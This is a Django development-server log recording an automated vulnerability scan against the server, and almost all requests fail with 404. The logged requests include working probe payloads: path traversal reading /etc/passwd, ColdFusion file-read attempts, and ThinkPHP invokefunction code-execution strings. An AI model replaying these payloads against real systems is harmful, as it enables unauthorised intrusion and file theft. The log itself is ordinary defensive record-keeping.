[07/Nov/2020 10:14:57] "POST /perl/ HTTP/1.1" 400 61729
Not Found: /e-cidade/fpdf151/mostrarelatorio.php
[07/Nov/2020 10:14:57] "GET /e-cidade/fpdf151/mostrarelatorio.php?arquivo=./../../../../../../etc/passwd HTTP/1.1" 404 2319
Not Found: /
[07/Nov/2020 10:14:57] "HEAD / HTTP/1.0" 404 2150
Not Found: //etc/passwd
[07/Nov/2020 10:14:58] "GET //etc/passwd HTTP/1.1" 404 2200
Not Found: /RsasTest766500541.html
[07/Nov/2020 10:14:59] "GET /RsasTest766500541.html HTTP/1.1" 404 2233
Not Found: /cgi-bin/webplus
[07/Nov/2020 10:15:00] "GET /cgi-bin/webplus?about HTTP/1.1" 404 2218
Not Found: /cgi-bin/webplus.exe
[07/Nov/2020 10:15:00] "GET /cgi-bin/webplus.exe?about HTTP/1.1" 404 2230
Not Found: /scripts/webplus
[07/Nov/2020 10:15:00] "GET /scripts/webplus?about HTTP/1.1" 404 2218
Not Found: /scripts/webplus.exe
[07/Nov/2020 10:15:00] "GET /scripts/webplus.exe?about HTTP/1.1" 404 2230
Not Found: /login.action
[07/Nov/2020 10:15:00] "GET /login.action HTTP/1.1" 404 2208
Not Found: /console/login/LoginForm.jsp
[07/Nov/2020 10:15:02] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 2253
[07/Nov/2020 10:15:02] code 400, message Bad HTTP/0.9 request type ('t3')
[07/Nov/2020 10:15:02] "t3 12.1.2" 400 -
Not Found: /cgi-bin/Aurora-1594156552.html
[07/Nov/2020 10:15:05] "GET /cgi-bin/Aurora-1594156552.html HTTP/1.1" 404 2257
Not Found: /cgi-bin/Aurora-1594156552.cgi
[07/Nov/2020 10:15:05] "GET /cgi-bin/Aurora-1594156552.cgi HTTP/1.1" 404 2254
Not Found: /cgi-bin/Aurora-1594156552.sh
[07/Nov/2020 10:15:05] "GET /cgi-bin/Aurora-1594156552.sh HTTP/1.1" 404 2251
Not Found: /cgi-bin/Aurora-1594156552.pl
[07/Nov/2020 10:15:05] "GET /cgi-bin/Aurora-1594156552.pl HTTP/1.1" 404 2251
Not Found: /cgi-bin/Aurora-1594156552.inc
[07/Nov/2020 10:15:05] "GET /cgi-bin/Aurora-1594156552.inc HTTP/1.1" 404 2254
Not Found: /cgi-bin/Aurora-1594156552.shtml
[07/Nov/2020 10:15:05] "GET /cgi-bin/Aurora-1594156552.shtml HTTP/1.1" 404 2260
Not Found: /cgi-bin/Aurora-1594156552.asp
[07/Nov/2020 10:15:05] "GET /cgi-bin/Aurora-1594156552.asp HTTP/1.1" 404 2254
Not Found: /cgi-bin/Aurora-1594156552.php
[07/Nov/2020 10:15:05] "GET /cgi-bin/Aurora-1594156552.php HTTP/1.1" 404 2254
Not Found: /cgi-bin/Aurora-1594156552.php3
[07/Nov/2020 10:15:05] "GET /cgi-bin/Aurora-1594156552.php3 HTTP/1.1" 404 2257
Not Found: /cgi-bin/Aurora-1594156552.cfm
[07/Nov/2020 10:15:05] "GET /cgi-bin/Aurora-1594156552.cfm HTTP/1.1" 404 2254
Not Found: /Aurora-1594156552.html
[07/Nov/2020 10:15:05] "GET /Aurora-1594156552.html HTTP/1.1" 404 2233
Not Found: /Aurora-1594156552.cgi
[07/Nov/2020 10:15:05] "GET /Aurora-1594156552.cgi HTTP/1.1" 404 2230
Not Found: /Aurora-1594156552.sh
[07/Nov/2020 10:15:05] "GET /Aurora-1594156552.sh HTTP/1.1" 404 2227
Not Found: /Aurora-1594156552.pl
[07/Nov/2020 10:15:06] "GET /Aurora-1594156552.pl HTTP/1.1" 404 2227
Not Found: /Aurora-1594156552.inc
[07/Nov/2020 10:15:06] "GET /Aurora-1594156552.inc HTTP/1.1" 404 2230
Not Found: /Aurora-1594156552.shtml
[07/Nov/2020 10:15:06] "GET /Aurora-1594156552.shtml HTTP/1.1" 404 2236
Not Found: /Aurora-1594156552.asp
[07/Nov/2020 10:15:06] "GET /Aurora-1594156552.asp HTTP/1.1" 404 2230
Not Found: /Aurora-1594156552.php
[07/Nov/2020 10:15:06] "GET /Aurora-1594156552.php HTTP/1.1" 404 2230
Not Found: /Aurora-1594156552.php3
[07/Nov/2020 10:15:06] "GET /Aurora-1594156552.php3 HTTP/1.1" 404 2233
Not Found: /Aurora-1594156552.cfm
[07/Nov/2020 10:15:06] "GET /Aurora-1594156552.cfm HTTP/1.1" 404 2230
[07/Nov/2020 10:15:06] code 400, message Bad request version ('request')
[07/Nov/2020 10:15:06] "some invalid request" 400 -
Not Found: /docs/docs/OfficeServer.jsp
[07/Nov/2020 10:15:08] "POST /docs/docs/OfficeServer.jsp HTTP/1.1" 404 2251
Not Found: /
[07/Nov/2020 10:15:09] "GET / HTTP/1.1" 404 2154
Not Found: /index
[07/Nov/2020 10:15:10] "GET /index HTTP/1.1" 404 2187
Not Found: /
[07/Nov/2020 10:15:11] "GET / HTTP/1.1" 404 2154
Not Found: /phpinfo.php
[07/Nov/2020 10:15:11] "GET /phpinfo.php HTTP/1.1" 404 2200
Not Found: /phpinfo.php
[07/Nov/2020 10:15:11] "GET /phpinfo.php HTTP/1.1" 404 2200
Not Found: /cgi-bin/phpinfo.php
[07/Nov/2020 10:15:12] "GET /cgi-bin/phpinfo.php HTTP/1.1" 404 2224
Not Found: /scripts/phpinfo.php
[07/Nov/2020 10:15:12] "GET /scripts/phpinfo.php HTTP/1.1" 404 2224
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/
Not Found: /
[07/Nov/2020 10:15:13] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/ HTTP/1.1" 404 2323
[07/Nov/2020 10:15:13] "GET / HTTP/1.1" 404 2154
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
[07/Nov/2020 10:15:13] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp HTTP/1.1" 404 2350
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/default.jsp
[07/Nov/2020 10:15:13] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/default.jsp HTTP/1.1" 404 2356
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/index.html
[07/Nov/2020 10:15:13] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/index.html HTTP/1.1" 404 2353
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/profile.jsp
[07/Nov/2020 10:15:13] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/profile.jsp HTTP/1.1" 404 2356
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/sort.jsp
[07/Nov/2020 10:15:13] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/sort.jsp HTTP/1.1" 404 2347
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/topic.jsp
[07/Nov/2020 10:15:13] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/topic.jsp HTTP/1.1" 404 2350
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/cgi-bin/
[07/Nov/2020 10:15:13] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/cgi-bin/ HTTP/1.1" 404 2347
Not Found: /
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/scripts/
[07/Nov/2020 10:15:13] "GET / HTTP/1.1" 404 2154
[07/Nov/2020 10:15:13] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/scripts/ HTTP/1.1" 404 2347
Not Found: /CFIDE/adminapi/administrator.cfc
[07/Nov/2020 10:15:15] "POST /CFIDE/adminapi/administrator.cfc HTTP/1.1" 404 2264
Not Found: /CFIDE/componentutils/cfcexplorer.cfc
[07/Nov/2020 10:15:15] "GET /CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=../../../license.txt HTTP/1.1" 404 2363
Not Found: /CFIDE/componentutils/cfcexplorer.cfc
[07/Nov/2020 10:15:15] "GET /CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=../../../../license.html HTTP/1.1" 404 2367
Not Found: /openmrs/ws/rest/
[07/Nov/2020 10:15:19] "GET /openmrs/ws/rest/ HTTP/1.1" 404 2220
Not Found: /ws/rest/
[07/Nov/2020 10:15:19] "GET /ws/rest/ HTTP/1.1" 404 2196
Not Found: /wcm/services/trswcm:SOAPService
[07/Nov/2020 10:15:20] "POST /wcm/services/trswcm:SOAPService HTTP/1.1" 404 2266
Not Found: /wcm/scan_trs.txt
[07/Nov/2020 10:15:20] "GET /wcm/scan_trs.txt HTTP/1.1" 404 2220
Not Found: /soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
[07/Nov/2020 10:15:20] "GET /soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml HTTP/1.1" 404 2320
Not Found: /LoginPage.do
[07/Nov/2020 10:15:20] "GET /LoginPage.do HTTP/1.1" 404 2208
Not Found: /
[07/Nov/2020 10:15:20] "GET / HTTP/1.1" 404 2154
Not Found: /version
[07/Nov/2020 10:15:20] "GET /version HTTP/1.1" 404 2193
Not Found: /usage/
[07/Nov/2020 10:15:20] "GET /usage/ HTTP/1.1" 404 2185
Not Found: /js/messages.php
[07/Nov/2020 10:15:20] "GET /js/messages.php HTTP/1.1" 404 2217
Not Found: /webalizer/
[07/Nov/2020 10:15:20] "GET /webalizer/ HTTP/1.1" 404 2197
Not Found: /doc/html/index.html
[07/Nov/2020 10:15:20] "GET /doc/html/index.html HTTP/1.1" 404 2229
Not Found: /Documentation.html
[07/Nov/2020 10:15:20] "GET /Documentation.html HTTP/1.1" 404 2226
Not Found: /phpmyadmin
[07/Nov/2020 10:15:20] "GET /phpmyadmin HTTP/1.1" 404 2202
Not Found: /phpmyadmin/js/messages.php
[07/Nov/2020 10:15:20] "GET /phpmyadmin/js/messages.php HTTP/1.1" 404 2250
Not Found: /phpmyadmin/doc/html/index.html
[07/Nov/2020 10:15:20] "GET /phpmyadmin/doc/html/index.html HTTP/1.1" 404 2262
Not Found: /phpmyadmin/Documentation.html
[07/Nov/2020 10:15:20] "GET /phpmyadmin/Documentation.html HTTP/1.1" 404 2259
Not Found: /phpMyAdmin
[07/Nov/2020 10:15:20] "GET /phpMyAdmin HTTP/1.1" 404 2202
Not Found: /phpMyAdmin/js/messages.php
[07/Nov/2020 10:15:20] "GET /phpMyAdmin/js/messages.php HTTP/1.1" 404 2250
Not Found: /phpMyAdmin/doc/html/index.html
[07/Nov/2020 10:15:20] "GET /phpMyAdmin/doc/html/index.html HTTP/1.1" 404 2262
Not Found: /phpMyAdmin/Documentation.html
[07/Nov/2020 10:15:20] "GET /phpMyAdmin/Documentation.html HTTP/1.1" 404 2259
Not Found: /pma
[07/Nov/2020 10:15:20] "GET /pma HTTP/1.1" 404 2181
Not Found: /pma/js/messages.php
[07/Nov/2020 10:15:20] "GET /pma/js/messages.php HTTP/1.1" 404 2229
Not Found: /pma/doc/html/index.html
[07/Nov/2020 10:15:20] "GET /pma/doc/html/index.html HTTP/1.1" 404 2241
Not Found: /pma/Documentation.html
[07/Nov/2020 10:15:20] "GET /pma/Documentation.html HTTP/1.1" 404 2238
Not Found: /WEB-INF./web.xml
[07/Nov/2020 10:15:20] "GET /WEB-INF./web.xml HTTP/1.1" 404 2215
Not Found: /index.php
[07/Nov/2020 10:15:22] "GET /index.php HTTP/1.1" 404 2199
Not Found: /index.php
[07/Nov/2020 10:15:22] "GET /index.php HTTP/1.1" 404 2199
Not Found: /public/index.php
[07/Nov/2020 10:15:22] "GET /public/index.php?s=/index/\think\app/invokefunction&function=phpinfo&vars[0]=8 HTTP/1.1" 404 2294
Not Found: /public/index.php
[07/Nov/2020 10:15:22] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=base64_decode&vars[1][]=cHUyM2Y1Yk9MaW1JOG80Sg== HTTP/1.1" 404 2358
Not Found: /index.php
[07/Nov/2020 10:15:22] "GET /index.php?s=/index/\think\app/invokefunction&function=phpinfo&vars[0]=8 HTTP/1.1" 404 2273
Not Found: /index.php
[07/Nov/2020 10:15:22] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=base64_decode&vars[1][]=cHUyM2Y1Yk9MaW1JOG80Sg== HTTP/1.1" 404 2337
Not Found: /cgi-bin/ustorekeeper.pl
[07/Nov/2020 10:15:25] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 2299
Not Found: /scripts/ustorekeeper.pl
[07/Nov/2020 10:15:26] "GET /scripts/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 2299
Not Found: /cgi-bin/php.cgi
[07/Nov/2020 10:15:27] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.1" 404 2224
Not Found: /fHevi7rLtsYCJ.html
[07/Nov/2020 10:15:27] "GET /fHevi7rLtsYCJ.html HTTP/1.1" 404 2226
Not Found: /index.html
[07/Nov/2020 10:15:27] "GET /index.html HTTP/1.1" 404 2202
Not Found: /scripts/php.cgi
[07/Nov/2020 10:15:28] "GET /scripts/php.cgi?/etc/passwd HTTP/1.1" 404 2224
Not Found: /invoker/readonly
[07/Nov/2020 10:15:28] "GET /invoker/readonly HTTP/1.1" 404 2220
Not Found: /
[07/Nov/2020 10:15:28] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 10:15:28] "PROPFIND / HTTP/1.1" 404 2159
Not Found: /
[07/Nov/2020 10:15:32] "GET / HTTP/1.1" 404 2154
Not Found: /horde/services/javascript.php
[07/Nov/2020 10:15:44] "POST /horde/services/javascript.php HTTP/1.1" 404 2260
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 33442)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[07/Nov/2020 10:16:48] "GET / HTTP/1.0" 404 2154
Not Found: /
[07/Nov/2020 10:16:48] "GET / HTTP/1.0" 404 2154
Not Found: /nice ports,/Trinity.txt.bak
[07/Nov/2020 10:16:48] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 404 2255
[07/Nov/2020 10:16:48] code 400, message Bad request syntax ('\x05\x04\x00\x01\x02\x80\x05\x01\x00\x03')
[07/Nov/2020 10:16:48] "  " 400 -
Not Found: /
[07/Nov/2020 10:16:48] "OPTIONS / HTTP/1.0" 404 2158
[07/Nov/2020 10:16:49] code 400, message Bad request version ('RTSP/1.0')
[07/Nov/2020 10:16:49] "OPTIONS / RTSP/1.0" 400 -
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 40658)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 51934)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[07/Nov/2020 10:16:59] code 400, message Bad request syntax ('HELP')
[07/Nov/2020 10:16:59] "HELP" 400 -
[07/Nov/2020 10:16:59] code 400, message Bad request syntax ('\x16\x03\x00\x00S\x01\x00\x00O\x03\x00?G×÷º,îê²`~ó\x00ý\x82{¹Õ\x96Èw\x9bæÄÛ<=Ûoï\x10n\x00\x00(\x00\x16\x00\x13\x00')
[07/Nov/2020 10:16:59] You're accessing the development server over HTTPS, but it only supports HTTP.

----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 59924)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[07/Nov/2020 10:17:04] code 400, message Bad request syntax ('\x01default')
[07/Nov/2020 10:17:04] "default" 400 -
[07/Nov/2020 10:17:04] code 400, message Bad request version ('SIP/2.0')
[07/Nov/2020 10:17:04] "OPTIONS sip:nm SIP/2.0" 400 -
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 32930)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[07/Nov/2020 10:17:09] "GET /?CAVIT HTTP/1.1" 404 2160
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 33688)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[07/Nov/2020 10:17:26] code 400, message Bad request syntax ('\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03Þ\x0cº`ò-!~\x10c\x1cÃNm1ö\x9a~t\\\x0fRPâ§¨Z\x8c]n\x98\x85\x00\x00|À,À0À+À/Ì©Ì¨\x00£\x00\x9f\x00¢\x00\x9eÌªÀ¯À\xadÀ$À(À')
[07/Nov/2020 10:17:26] You're accessing the development server over HTTPS, but it only supports HTTP.

Not Found: /
[07/Nov/2020 10:17:28] "GET / HTTP/1.1" 404 2154
Not Found: /e-cidade/fpdf151/mostrarelatorio.php
[07/Nov/2020 10:17:28] "GET /e-cidade/fpdf151/mostrarelatorio.php?arquivo=./../../../../../../etc/passwd HTTP/1.1" 404 2319
Not Found: /
[07/Nov/2020 10:17:30] "GET / HTTP/1.1" 404 2149
Not Found: /
[07/Nov/2020 10:17:30] "GET / HTTP/1.0" 404 2154
Not Found: /
[07/Nov/2020 10:17:30] "GET /" 404 2154
Not Found: /
[07/Nov/2020 10:17:30] "HEAD / HTTP/1.1" 404 2150
Not Found: /phpBB/index.php
[07/Nov/2020 10:17:30] "GET /phpBB/index.php HTTP/1.0" 404 2212
Not Found: /cgi-bin/Web_store/web_store.cgi
[07/Nov/2020 10:17:30] "POST /cgi-bin/Web_store/web_store.cgi HTTP/1.0" 404 2261
Not Found: /
[07/Nov/2020 10:17:30] "HEAD / HTTP/1.0" 404 2150
Not Found: /chassis/config/GeneralChassisConfig.html
[07/Nov/2020 10:17:31] "GET /chassis/config/GeneralChassisConfig.html HTTP/1.1" 404 2287
Not Found: /console/login/LoginForm.jsp
[07/Nov/2020 10:17:34] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 2253
Not Found: /login.action
[07/Nov/2020 10:17:34] "GET /login.action HTTP/1.1" 404 2208
[07/Nov/2020 10:17:34] code 400, message Bad HTTP/0.9 request type ('t3')
[07/Nov/2020 10:17:34] "t3 12.1.2" 400 -
Invalid HTTP_HOST header: '172.16.4.4Content-Length: 49'. The domain name provided is not valid according to RFC 1034/1035.
Bad Request: /perl/
[07/Nov/2020 10:17:35] "POST /perl/ HTTP/1.1" 400 61729
Not Found: /RsasTest1856278561.html
[07/Nov/2020 10:17:36] "GET /RsasTest1856278561.html HTTP/1.1" 404 2236
Not Found: /cgi-bin/webplus
[07/Nov/2020 10:17:36] "GET /cgi-bin/webplus?about HTTP/1.1" 404 2218
Not Found: /cgi-bin/webplus.exe
[07/Nov/2020 10:17:36] "GET /cgi-bin/webplus.exe?about HTTP/1.1" 404 2230
Not Found: /scripts/webplus
[07/Nov/2020 10:17:37] "GET /scripts/webplus?about HTTP/1.1" 404 2218
Not Found: /scripts/webplus.exe
[07/Nov/2020 10:17:37] "GET /scripts/webplus.exe?about HTTP/1.1" 404 2230
Not Found: //etc/passwd
[07/Nov/2020 10:17:42] "GET //etc/passwd HTTP/1.1" 404 2200
[07/Nov/2020 10:17:43] code 400, message Bad request version ('request')
[07/Nov/2020 10:17:43] "some invalid request" 400 -
Not Found: /cgi-bin/Aurora-941791744.html
[07/Nov/2020 10:17:44] "GET /cgi-bin/Aurora-941791744.html HTTP/1.1" 404 2254
Not Found: /cgi-bin/Aurora-941791744.cgi
[07/Nov/2020 10:17:44] "GET /cgi-bin/Aurora-941791744.cgi HTTP/1.1" 404 2251
Not Found: /cgi-bin/Aurora-941791744.sh
[07/Nov/2020 10:17:44] "GET /cgi-bin/Aurora-941791744.sh HTTP/1.1" 404 2248
Not Found: /cgi-bin/Aurora-941791744.pl
[07/Nov/2020 10:17:44] "GET /cgi-bin/Aurora-941791744.pl HTTP/1.1" 404 2248
Not Found: /cgi-bin/Aurora-941791744.inc
[07/Nov/2020 10:17:44] "GET /cgi-bin/Aurora-941791744.inc HTTP/1.1" 404 2251
Not Found: /cgi-bin/Aurora-941791744.shtml
[07/Nov/2020 10:17:44] "GET /cgi-bin/Aurora-941791744.shtml HTTP/1.1" 404 2257
Not Found: /docs/docs/OfficeServer.jsp
[07/Nov/2020 10:17:44] "POST /docs/docs/OfficeServer.jsp HTTP/1.1" 404 2251
Not Found: /cgi-bin/Aurora-941791744.asp
[07/Nov/2020 10:17:45] "GET /cgi-bin/Aurora-941791744.asp HTTP/1.1" 404 2251
Not Found: /cgi-bin/Aurora-941791744.php
[07/Nov/2020 10:17:45] "GET /cgi-bin/Aurora-941791744.php HTTP/1.1" 404 2251
Not Found: /cgi-bin/Aurora-941791744.php3
[07/Nov/2020 10:17:45] "GET /cgi-bin/Aurora-941791744.php3 HTTP/1.1" 404 2254
Not Found: /cgi-bin/Aurora-941791744.cfm
[07/Nov/2020 10:17:45] "GET /cgi-bin/Aurora-941791744.cfm HTTP/1.1" 404 2251
Not Found: /Aurora-941791744.html
[07/Nov/2020 10:17:45] "GET /Aurora-941791744.html HTTP/1.1" 404 2230
Not Found: /Aurora-941791744.cgi
[07/Nov/2020 10:17:45] "GET /Aurora-941791744.cgi HTTP/1.1" 404 2227
Not Found: /Aurora-941791744.sh
[07/Nov/2020 10:17:45] "GET /Aurora-941791744.sh HTTP/1.1" 404 2224
Not Found: /Aurora-941791744.pl
[07/Nov/2020 10:17:45] "GET /Aurora-941791744.pl HTTP/1.1" 404 2224
Not Found: /Aurora-941791744.inc
[07/Nov/2020 10:17:45] "GET /Aurora-941791744.inc HTTP/1.1" 404 2227
Not Found: /Aurora-941791744.shtml
[07/Nov/2020 10:17:45] "GET /Aurora-941791744.shtml HTTP/1.1" 404 2233
Not Found: /Aurora-941791744.asp
[07/Nov/2020 10:17:46] "GET /Aurora-941791744.asp HTTP/1.1" 404 2227
Not Found: /Aurora-941791744.php
[07/Nov/2020 10:17:46] "GET /Aurora-941791744.php HTTP/1.1" 404 2227
Not Found: /Aurora-941791744.php3
[07/Nov/2020 10:17:46] "GET /Aurora-941791744.php3 HTTP/1.1" 404 2230
Not Found: /Aurora-941791744.cfm
[07/Nov/2020 10:17:46] "GET /Aurora-941791744.cfm HTTP/1.1" 404 2227
Not Found: /
[07/Nov/2020 10:17:46] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 10:17:46] "GET / HTTP/1.1" 404 2154
Not Found: /index
[07/Nov/2020 10:17:46] "GET /index HTTP/1.1" 404 2187
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/
[07/Nov/2020 10:17:48] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/ HTTP/1.1" 404 2323
Not Found: /
[07/Nov/2020 10:17:48] "GET / HTTP/1.1" 404 2154
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
[07/Nov/2020 10:17:48] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp HTTP/1.1" 404 2350
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/default.jsp
[07/Nov/2020 10:17:48] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/default.jsp HTTP/1.1" 404 2356
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/index.html
[07/Nov/2020 10:17:48] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/index.html HTTP/1.1" 404 2353
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/profile.jsp
[07/Nov/2020 10:17:48] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/profile.jsp HTTP/1.1" 404 2356
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/sort.jsp
[07/Nov/2020 10:17:48] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/sort.jsp HTTP/1.1" 404 2347
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/topic.jsp
[07/Nov/2020 10:17:49] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/topic.jsp HTTP/1.1" 404 2350
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/cgi-bin/
[07/Nov/2020 10:17:49] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/cgi-bin/ HTTP/1.1" 404 2347
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/scripts/
[07/Nov/2020 10:17:50] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/scripts/ HTTP/1.1" 404 2347
Not Found: /phpinfo.php
[07/Nov/2020 10:17:54] "GET /phpinfo.php HTTP/1.1" 404 2200
Not Found: /phpinfo.php
[07/Nov/2020 10:17:55] "GET /phpinfo.php HTTP/1.1" 404 2200
Not Found: /openmrs/ws/rest/
[07/Nov/2020 10:17:55] "GET /openmrs/ws/rest/ HTTP/1.1" 404 2220
Not Found: /cgi-bin/phpinfo.php
